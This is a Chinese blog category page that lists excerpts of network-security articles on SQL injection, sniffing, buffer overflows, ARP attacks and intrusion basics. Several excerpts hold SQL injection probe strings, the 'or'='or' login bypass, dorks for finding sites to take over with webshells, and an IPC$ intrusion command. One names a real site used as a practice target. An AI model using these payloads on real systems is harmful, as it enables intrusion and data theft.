网络安全
文章平均质量分 53
lenhan12345
这个作者很懒,什么都没留下…
展开
-
Ciphey安装过程-记录踩过的坑
由于ctf解码需要安装ciphey,网上资料较少,github项目主页上也说得不是很详细,现把整个操作系统安装到ciphey安装做一记录。1、项目需要在linux上运行,前面在windows上试了win7,win10老是报编码问题,下载最新版的kali2021.2的vm版本,地址:https://images.kali.org/virtual-images/kali-linux-2021.2-vmware-amd64.7z 直接把这个地址放到迅雷里面下载,下载解压后,直接打开linux系统。2...原创 2021-07-17 19:11:23 · 10191 阅读 · 5 评论 -
Web渗透之网站信息、域名信息、端口信息、敏感信息及指纹信息收集
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Powershell基础入门知识,涉及条件语句、循环语句、数组、函数 、字符串操作、注册表访问等。这篇文章将分享Web渗透的第一步工作,涉及网站信息、域名信息、端口信息、敏感信息及指纹信息收集————————————————版权声明:本文为CSDN博主「Eastmou...转载 2020-02-22 14:24:46 · 692 阅读 · 0 评论 -
防MDB数据库被下载的方法
篇首语:原来改mdb为asp就能防下载是鬼话。用Flashget试验下载data.asp文件,并另存为data.mdb文件,发现用ACCESS打开完好无损! 1.发挥你的想象力 修改数据库文件名但是若攻击者通过第三方途径获得了数据库的路径,就可以下载数据库。故保密性为最低。2.数据库名后缀改为ASA、ASP等此法须配合一些要进行一些设置,否则就会出现本文开头的那种情况(1)二进制字段添加。(2)在转载 2007-09-05 09:53:00 · 1416 阅读 · 0 评论 -
嗅探原理与反嗅探技术详解
嗅探器的英文写法是Sniff,可以理解为一个安装在计算机上的窃听设备它可以用来窃听计算机在网络上所产生的众多的信息一.嗅探器的基础知识1.1 什么是嗅探器?嗅探器的英文写法是Sniff,可以理解为一个安装在计算机上的窃听设备它可以用来窃听计算机在网络上所产生的众多的信息。简单一点解释:一部电话的窃听装置, 可以用来窃听双方通话的内容,而计算机网络嗅探器则可以窃听计算机程序在网络上发送和接收到的数据转载 2007-04-06 10:28:00 · 5819 阅读 · 0 评论 -
2006年网站入侵技术综合总结
虽然没有具体的技术,但是基本上包括了对网站脚本方面攻击的技术.提供一个渗透时的思路罢了,不知在什么地方见到的,转一下----------------------------------------------------------------一:技术总结 随着互联网络的飞速发展,各种各样的大小网站不断地涌现,在这些大小网站中,动态的网站以其实用性、多样性占据了绝对的优势。 由于ASP系转载 2007-04-06 10:26:00 · 2012 阅读 · 1 评论 -
最佳的75个网络安全工具
工具:Nessus(最好的开放源代码风险评估工具) 网址:http://www.nessus.org/ 类别:开放源码 平台:Linux/BSD/Unix 简介:Nessus是一款可以运行在Linux、BSD、Solaris以及其他一些系统上的远程安全扫描软件。它是多线程、基于插入式的软件,拥有很好 的GTK界面,能够完成超过1200项的远程安全检查,具有强大的报告输出能力,可以产生HTM转载 2007-06-22 11:51:00 · 3081 阅读 · 2 评论 -
自己写溢出的基础,溢出原理(2)
利用call压入下一条语句的返回地址,把数据作为下一条指令我们就可以达到目的。 Jmp CALL Popl %esi ‘利用CALL弹出压入的下一条语句的地址,其实就是我们构造的字符串的地址 movb $0x0,0x7(%esi) ‘输入0的字符串为结尾 mov %esi,0X8 (%esi) ‘构造NAME数组,放如字串的地址作为NAME[0] mov $0x0,0xc(%esi) ‘构造NAM转载 2007-03-02 15:13:00 · 1114 阅读 · 0 评论 -
SQL注入天书之ASP注入漏洞全接触
引 言 随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。 SQL注入是转载 2007-03-02 15:08:00 · 777 阅读 · 0 评论 -
站长注意:万能Asp防注入代码
这几天着实为sql注入漏洞伤了神,网上的代码好多不是很深奥就是麻烦 终于找到了万能防注代码,分享了,呵呵 操作简单上手,只要来个包含或放入conn.asp中,搞定 末了,估计还有一些危险字符没有放全,帮我补全一下,谢谢了 ’’’’--------定义部份------------------ Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr ’原创 2007-03-02 14:44:00 · 1596 阅读 · 0 评论 -
自己写溢出的基础,溢出原理(1)
一:基础知识 计算机内存运行分配的区域分为3个 程序段区域:不允许写的 数据段区域:静态全局变量是位于数据段并且在程序开始运行的时候被加载 堆栈区域:放置程序的动态的用于计算的局部和临时变量则分配在堆栈里面和在过程调用中压入的返回地 址数据。堆栈是一个先入后出的队列。一般计算机系统堆栈的方向与内存的方向相反。压栈的xx作push= ESP-4,出栈的xx作是pop=ESP+4. 在一次函数调用中,转载 2007-03-02 15:12:00 · 1227 阅读 · 0 评论 -
全面了解ASP注入方法
>1.判断是否有注入;and 1=1;and 1=22.初步判断是否是mssql;and user>03.注入参数是字符and [查询条件] and =4.搜索时没过滤参数的and [查询条件] and %25=5.判断数据库系统;and (select count(*) from sysobjects)>0 mssql;and (select count(*) f原创 2007-03-02 14:52:00 · 785 阅读 · 0 评论 -
菜鸟SQL注入详解
利用SQL进行添加,更改,查看记录! 当一台主机台开了80端口,当你手头没有任何黑客工具,那么,偶们有SQL。他不需要你其他东东,只要一个浏览器就够了。HOHO,偶的文章菜菜,偶写这篇文章只是为了让一些对SQL很陌生的菜菜们看的,老鸟绕道。。。 1,什么是SQL注入? SQL转载 2007-09-27 15:32:00 · 1363 阅读 · 0 评论 -
SQL注入原理,值得一看!
SQL注入原理,值得一看!随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。SQL注入是转载 2007-09-27 15:07:00 · 971 阅读 · 0 评论 -
其它的
<br />HTTP://www.jixiaodong.com/editor/UploadFile/201111201340727.asp原创 2011-01-07 21:39:00 · 483 阅读 · 0 评论 -
研究E语言开远控软件~
<br />最近一直在研究使用E语言开发远控软件,有兴趣的朋友我们可以一起来讨论一下~~原创 2010-10-03 15:01:00 · 480 阅读 · 0 评论 -
局域网反功击
局域网黑客软件:WinArpAttacker3.5大家安装好防火墙后,只要发觉局域网内有人攻击,可以马上用该黑客软件进行反攻击.本人经常用来攻击那些讨厌的家伙,每次都成能功逼其下线!嘻嘻. WinArpAttacker3.5中文教学手册今天我们来学习一下WinArpAttacker这个ARP攻击软件的使用方法。WinArpAttacker的界面分为四块输出区域。第一转载 2009-10-29 20:12:00 · 1512 阅读 · 0 评论 -
入侵简单思路
你要做黑客?很好,所以这篇文章就是教你一些做黑客的基本知识,这些知识都是超级菜鸟级的基本功,本文不会涉及到攻击的具体技术,不会具体去教你攻击哪些漏洞,但是会告诉你,如果要进攻一台主机,你应该做些什么,拿着这篇文章,就不需要再去黑客论坛里面发布诸“请告诉我如何获得主机的最高权限”,或者“如何进攻win2000”之类的令人无可适从的问题,而这些问题获得实质性的回答的机会也是非常小的,所以,我也权将此转载 2009-10-29 19:55:00 · 649 阅读 · 0 评论 -
IT精英必须掌握的命令行
一,ping 它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定目标主机的存在,可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看原创 2009-06-29 09:37:00 · 454 阅读 · 0 评论 -
全程追踪入侵JSP网站服务器
在用JSP制作的电子商务网站多如牛毛。但是对于JSP网站而言,安全性真的能够让人放心吗?面对层出不穷的黑客攻击和病毒袭击,JSP网站的服务器能够比其他网站的服务器器更加安全吗?前段时间,应朋友之邀,我对他们托管的三台服务器的主机进行了测试,发现了JSP网站存在的几个问题。 入侵测试第一步:扫描 扫描是入侵的第一步,它可以让你对即将入侵的目标有一个全面的了解。同时扫描还有可能发现扫描对象的漏洞,转载 2009-08-25 11:20:00 · 466 阅读 · 0 评论 -
如何防止网站注入攻击
随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。SQL注入是从正常的WWW端口访问,而原创 2009-08-24 14:40:00 · 888 阅读 · 0 评论 -
扔掉工具,让你飞速学会手工注入
前言: 现在的网络,脚本入侵十分的流行,而脚本注入漏洞更是风靡黑客界。不管是老鸟还是新起步的小菜,都会为它那巨大的威力和灵活多变的招式所着迷! 正是因为注入攻击的流行,使的市面上的注入工具层出不穷!比较出名的有小竹的NBSI、教主的HDSI和啊D的注入工具等等!这大大方便的小菜们掌握注入漏洞!可是,工具是死的,注入的手法却是活的,能否根据实际情况灵活地构造SQL注入语句,得到自己原创 2009-04-09 19:32:00 · 657 阅读 · 0 评论 -
全新的注入点检测方法(增加测试例子)
现在有很多防注入程序屏蔽了 and、1=1、1=2 类似这样的关键字,使用这样的方法有时不能探测到注入点了。那么是否有新的方法能够探测注入点呢? 经过一段时间的研究,发现了更好的方法。哈哈,特此共享一下。现在假设有一个新闻页面,URL 是 http://gzkb.goomoo.cn/news.asp?id=123,1. 在浏览器中打开,可以看到一个正常的新闻页面; 2. 在URL地址后面加上-1,转载 2009-04-09 18:52:00 · 780 阅读 · 0 评论 -
45种可以拿到Webshell的程序
GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!2,到Google ,site:cq.cn inurl:asp3,利用挖掘鸡和一个ASP木马.文件名是login.asp路径组是/manage/关键词是went.asp用or=or来登陆4,关键字:Co Net MIB Ver 1.0网站后台管理系统帐号密码为 or=or5.动感购物系统inur转载 2009-04-08 22:46:00 · 13224 阅读 · 0 评论 -
如何查找SQL注入点
如何查找注入点!小弟有一些个技巧!如果出现:服务器上URL出错之类的提示你可以尝试用一些注入工具来进行注入!如果实在找不到注入点的话,你还可以构造注入点!相关文章你可以参考!如下文章:最近sql inject 可是说是红遍了整个中国,不知道多少网站在sql inject 面前轰然倒下,其实 Sql inject 在国外技术已经很成熟了,而国内则是在近一两年内慢慢走向成熟。在一个个惨痛的实例面前,脚原创 2007-02-15 09:40:00 · 9895 阅读 · 2 评论 -
SQL注入的另类技巧
我的目的主要是取得网站的目录,当然了,网站和mssql数据库在一台服务器上,权限DB_owner。 在某官网发现了一个注点,一个号提示"xxxxxxxxxx0出现错误 " ,经过初步的分析是把单引号,直接转换成了0,所以如果用工具肯定注入不了,实践证明工具不行,但能检测出来其权限为:DB_owner,手工检测的方法无非是: and 1=(select is_isvrolemember(原创 2007-02-15 09:52:00 · 703 阅读 · 0 评论 -
SQL注入不完全思路与防注入程序
<一>SQL注入简介 许多网站程序在编写时,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,(一般是在浏览器地址栏进行,通过正常的www端口访问)根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。 <二>SQL注入思路 思路最重要。其实好多人都不知道SQL到底能做什么呢?这里总结一下SQL注入入侵的总原创 2007-02-15 09:51:00 · 1771 阅读 · 0 评论 -
SQL注入漏洞攻防必杀技
SQL注入是常见的利用程序漏洞进行攻击的方法,是很多入门级“黑客”喜欢采用的攻击方式,近来网上对它的讨论很热烈,所以我在本期专题中为读者揭示SQL攻击的主要原理以及如何防范这种攻击。攻击源于程序漏洞 SQL注入原理导致SQL注入攻击的漏洞并非系统造成的,主要是程序员在编程中忽略了安全因素,他的原理并不复杂。引 言 随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由转载 2007-02-15 09:49:00 · 685 阅读 · 0 评论 -
SQL注入常用语句
是否支持多句查询http://www.xxx.com/xxxnews/shownews.asp?id=51;declare @a int-- 是否支持子查询http://www.xxx.com/xxxnews/shownews.asp?id=51 and (Select count(1) from [sysobjects])>=0返回用户名http://www.xxx.com/xxxn原创 2007-02-15 09:48:00 · 852 阅读 · 0 评论 -
SQLSERVER高级注入技巧
SQLSERVER高级注入技巧[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]update 表名 se原创 2007-02-15 09:47:00 · 929 阅读 · 0 评论 -
SQL注入一日通
(此文章是对网上大量同类文章的分析与总结,并结合自己实施过程中的体会综合而成,其中有不少直接引用,没有注意出处,请原作者见谅)随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他转载 2007-02-15 09:46:00 · 571 阅读 · 0 评论 -
SQL注入工具大比拼
前言 随着ASP的日趋成熟,各种检测工具也逐渐流行了起来。如今,几乎每一个学习黑客的网迷手里都有一款或几款得心应手的注入工具。但我通过QQ群了解到,有相当一大部分人认为这些工具的注入手法是相同或相近的。其实这种说法只说对了一部分,在提交“and 1=1”、“and 1=2”进行漏洞判断时,这些软件所使用的方式的确是一样的,但接下来在猜解表名、猜解列名、猜解记录上,各软件所用的方式方法却不尽相同。转载 2007-02-15 09:26:00 · 1525 阅读 · 0 评论 -
关闭135、139、445、593、1025 等端口
操作要领:封闭端口,杜绝网络病毒对这些端口的访问权,以保障计算机安全,减少病毒对上网速度的影响。 近日发现有些人感染了新的网络蠕虫病毒,该病毒使用冲击波病毒专杀工具无法杀除,请各位尽快升级计算机上的杀毒软件病毒库,在断开计算机网络连接的情况下扫描硬盘,查杀病毒。安装了防火墙软件的用户,请 封闭 TCP 135、139、445、593、1025 端口和 UDP 135、137、138、445 端口原创 2007-02-15 08:44:00 · 3245 阅读 · 0 评论 -
新学入侵常用的命令.
下面初级的入侵命令。 1、NET 只要你拥有某IP的用户名和密码,那就用IPC$做连接吧! 这里我们假如你得到的用户是aaa,密码是123456。假设对方IP为127.0.0.1 net use //127.0.0.1/ipc$ "123456" /user:"aaa"退出的命令是 net use //127.0.0.1/ipc$ /del下面的操作你必须登陆后才可原创 2007-02-15 08:42:00 · 555 阅读 · 0 评论 -
SQL注入技巧资料大全
1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssql ;and (select count(*) from msysobjects)>0 access 4.注入参数是字符 and [查询条件] and = 5.搜索时没过滤原创 2007-02-15 09:53:00 · 583 阅读 · 0 评论 -
注入的几条简单语句,不用像网上那样复杂
一、版本url/1.asp?id=1 and @@VERSION>0二、跨库url/1.asp?id=1 and 1=(select db_name(n))n改成0,1,2,3……就可以跨库了,是不是比网上的简单呢?三、列名url/1.asp?id=1 and 1=(select col_name(object_id(表名),n) 表名可以换成16进制。像bbsuser=0x6200620原创 2007-02-15 09:55:00 · 506 阅读 · 0 评论 -
快速学习,理解.SQL注入技术
检测可否注入http://127.0.0.1/xx?id=11 and 1=1 (正常页面)http://127.0.0.1/xx?id=11 and 1=2 (出错页面)检测表段的http://127.0.0.1/xx?id=11 and exists (select * from admin) 检测字段的http://127.0.0.1/xx?id=11 and exists (select原创 2007-02-15 09:56:00 · 508 阅读 · 0 评论 -
SQL注入总结大全
Sql注射总结(早源于or1=1)最重要的表名:select * from sysobjectssysobjects ncsysobjectssysindexes tsysindexessyscolumnssystypessysuserssysdatabasessysxloginssysprocesses最重要的一些用户名(默认sql数据库中存在着的)publicdboguest(转载 2007-02-15 09:31:00 · 706 阅读 · 0 评论 -
国内十大破解论坛
十大只是一个称谓,以下的十大破解论坛包括了人气、原创、内容的综合体。如果需要破解和注册码注册机之类的东东,在下面几个站基本可以找到。icech推荐的打上★号。1.龙族联盟论坛★http://www.chinadforce.com/2.霏凡软件论坛★http://bbs.crsky.com/3.赢政天下论坛★http://bbs.winzheng.com/4.万花筒极酷大论坛http://bbs转载 2007-02-15 09:29:00 · 54206 阅读 · 2 评论 -
给大家发一个SQL注入实战教程吧
这篇文章是去年10月份发的,我今年3月份才发现,这么长时间以来我的网站www.shbbs.net一直被当作教程攻击,呵呵,晕死。直到有一个好心网友提醒我我才做了一些处理。大家不要再按教程上直接使用攻击我的网站www.shbbs.net了,呵呵我已经打了预防针了:)找别人的去演习吧:)以下是文章部分,还有动画教程,呵呵,晕死:)实战 SQL Injection目标:www.shbbs转载 2007-02-15 09:28:00 · 6950 阅读 · 0 评论 -
SQL注入网站入侵实例
这几天闲得无聊,想上网Down几部电影来看,找了找都是要Money的,不爽,花时间跑去汇钱还不如找个有漏洞的黑一黑。于是,计划开始:(为避免不必要的误会,网址、用户名、密码做了一些修改,不过方法是100%原汁原味) 1.寻找入口 准备:如果你以前没尝试过SQL注入攻击,那应该把HTTP友好提示关闭,这样才能让你清楚看到服务器端返回的提示信息。 尝试几个有传入参数的页面,逐个测试是否有SQL注原创 2007-02-15 09:19:00 · 1330 阅读 · 0 评论